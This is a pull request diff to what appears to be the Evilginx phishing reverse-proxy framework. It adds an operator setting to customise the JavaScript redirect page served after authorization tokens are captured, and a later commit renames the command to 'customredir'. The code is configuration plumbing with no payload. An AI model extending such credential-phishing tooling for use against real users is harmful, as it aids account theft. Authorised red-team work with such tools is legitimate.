### PR TITLE
Add ability to customise redirect page contents

### DIFF
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,4 +1,5 @@
 # Unreleased
+- Feature: Added ability to customise the JavaScript redirect page contents by providing a format string to the `config custom_redir <redirect_code>` option
 - Fixed: Redirection to `redirect_url` on page reload after authorization tokens have been captured.
 
 # 3.3.0

--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,5 +1,5 @@
 # Unreleased
-- Feature: Added ability to customise the JavaScript redirect page contents by providing a format string to the `config custom_redir <redirect_code>` option
+- Feature: Added ability to customise the JavaScript redirect page contents by providing a format string to the `config customredir <redirect_code>` option
 - Fixed: Redirection to `redirect_url` on page reload after authorization tokens have been captured.
 
 # 3.3.0

--- a/core/config.go
+++ b/core/config.go
@@ -71,6 +71,7 @@ type GeneralConfig struct {
 	ExternalIpv4 string `mapstructure:"external_ipv4" json:"external_ipv4" yaml:"external_ipv4"`
 	BindIpv4     string `mapstructure:"bind_ipv4" json:"bind_ipv4" yaml:"bind_ipv4"`
 	UnauthUrl    string `mapstructure:"unauth_url" json:"unauth_url" yaml:"unauth_url"`
+	CustomRedir  string `mapstructure:"custom_redir" json:"custom_redir" yaml:"custom_redir"`
 	HttpsPort    int    `mapstructure:"https_port" json:"https_port" yaml:"https_port"`
 	DnsPort      int    `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"`
 	Autocert     bool   `mapstructure:"autocert" json:"autocert" yaml:"autocert"`
@@ -822,4 +823,15 @@ func (c *Config) GetGoPhishApiKey() string {
 
 func (c *Config) GetGoPhishInsecureTLS() bool {
 	return c.gophishConfig.InsecureTLS
+}
+
+func (c *Config) GetCustomRedir() string {
+	return c.general.CustomRedir
+}
+
+func (c *Config) SetCustomRedir(redir string) {
+	c.general.CustomRedir = redir
+	c.cfg.Set(CFG_GENERAL, c.general)
+	log.Info("custom redirect location set to: %s", redir)
+	c.cfg.WriteConfig()
 }

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -51,6 +51,7 @@ const (
 
 const (
 	HOME_DIR = ".evilginx"
+	DEFAULT_REDIRECT_CODE = "<html><head><meta name='referrer' content='no-referrer'><script>top.location.href='%s';</script></head><body></body></html>"
 )
 
 const (
@@ -1313,7 +1314,11 @@ func (p *HttpProxy) interceptRequest(req *http.Request, http_status int, body st
 }
 
 func (p *HttpProxy) javascriptRedirect(req *http.Request, rurl string) (*http.Request, *http.Response) {
-	body := fmt.Sprintf("<html><head><meta name='referrer' content='no-referrer'><script>top.location.href='%s';</script></head><body></body></html>", rurl)
+	redir := p.cfg.GetCustomRedir()
+	if redir == "" {
+		redir = DEFAULT_REDIRECT_CODE
+	}
+	body := fmt.Sprintf(redir, rurl)
 	resp := goproxy.NewResponse(req, "text/html", http.StatusOK, body)
 	if resp != nil {
 		return req, resp

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -192,13 +192,13 @@ func (t *Terminal) handleConfig(args []string) error {
 			gophishInsecure = "true"
 		}
 
-		keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure", "custom_redir"}
+		keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure", "customredir"}
 		vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure, t.cfg.general.CustomRedir}
 		log.Printf("\n%s\n", AsRows(keys, vals))
 		return nil
 	} else if pn == 2 {
 		switch args[0] {
-		case "custom_redir":
+		case "customredir":
 			t.cfg.SetCustomRedir(args[1])
 			return nil
 		case "domain":
@@ -1176,7 +1176,7 @@ func (t *Terminal) createHelp() {
 	h.AddSubCommand("config", []string{"gophish", "api_key"}, "gophish api_key <key>", "set up the api key for the gophish instance to communicate with")
 	h.AddSubCommand("config", []string{"gophish", "insecure"}, "gophish insecure <true|false>", "enable or disable the verification of gophish tls certificate (set to `true` if using self-signed certificate)")
 	h.AddSubCommand("config", []string{"gophish", "test"}, "gophish test", "test the gophish configuration")
-	h.AddSubCommand("config", []string{"custom_redir"}, "custom_redir <redirect_code>", "provide a (quoted) format string HTML page for redirects where %s will be replaced with the redirect URI")
+	h.AddSubCommand("config", []string{"customredir"}, "customredir <redirect_code>", "provide a (quoted) format string HTML page for redirects where %s will be replaced with the redirect URI")
 
 	h.AddCommand("proxy", "general", "manage proxy configuration", "Configures proxy which will be used to proxy the connection to remote website", LAYER_TOP,
 		readline.PcItem("proxy", readline.PcItem("enable"), readline.PcItem("disable"), readline.PcItem("type"), readline.PcItem("address"), readline.PcItem("port"), readline.PcItem("username"), readline.PcItem("password")))

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -192,12 +192,15 @@ func (t *Terminal) handleConfig(args []string) error {
 			gophishInsecure = "true"
 		}
 
-		keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure"}
-		vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure}
+		keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure", "custom_redir"}
+		vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure, t.cfg.general.CustomRedir}
 		log.Printf("\n%s\n", AsRows(keys, vals))
 		return nil
 	} else if pn == 2 {
 		switch args[0] {
+		case "custom_redir":
+			t.cfg.SetCustomRedir(args[1])
+			return nil
 		case "domain":
 			t.cfg.SetBaseDomain(args[1])
 			t.cfg.ResetAllSites()
@@ -1173,6 +1176,7 @@ func (t *Terminal) createHelp() {
 	h.AddSubCommand("config", []string{"gophish", "api_key"}, "gophish api_key <key>", "set up the api key for the gophish instance to communicate with")
 	h.AddSubCommand("config", []string{"gophish", "insecure"}, "gophish insecure <true|false>", "enable or disable the verification of gophish tls certificate (set to `true` if using self-signed certificate)")
 	h.AddSubCommand("config", []string{"gophish", "test"}, "gophish test", "test the gophish configuration")
+	h.AddSubCommand("config", []string{"custom_redir"}, "custom_redir <redirect_code>", "provide a (quoted) format string HTML page for redirects where %s will be replaced with the redirect URI")
 
 	h.AddCommand("proxy", "general", "manage proxy configuration", "Configures proxy which will be used to proxy the connection to remote website", LAYER_TOP,
 		readline.PcItem("proxy", readline.PcItem("enable"), readline.PcItem("disable"), readline.PcItem("type"), readline.PcItem("address"), readline.PcItem("port"), readline.PcItem("username"), readline.PcItem("password")))


### PR DESCRIPTION
This PR provides the capability to override the default HTML/JavaScript redirect template with an alternate format string. Currently inline in the config file given the length of the default value and the fact that its a format string, not sure if this would be better as a reference to a file or another approach with a more explicit variable for the URL instead?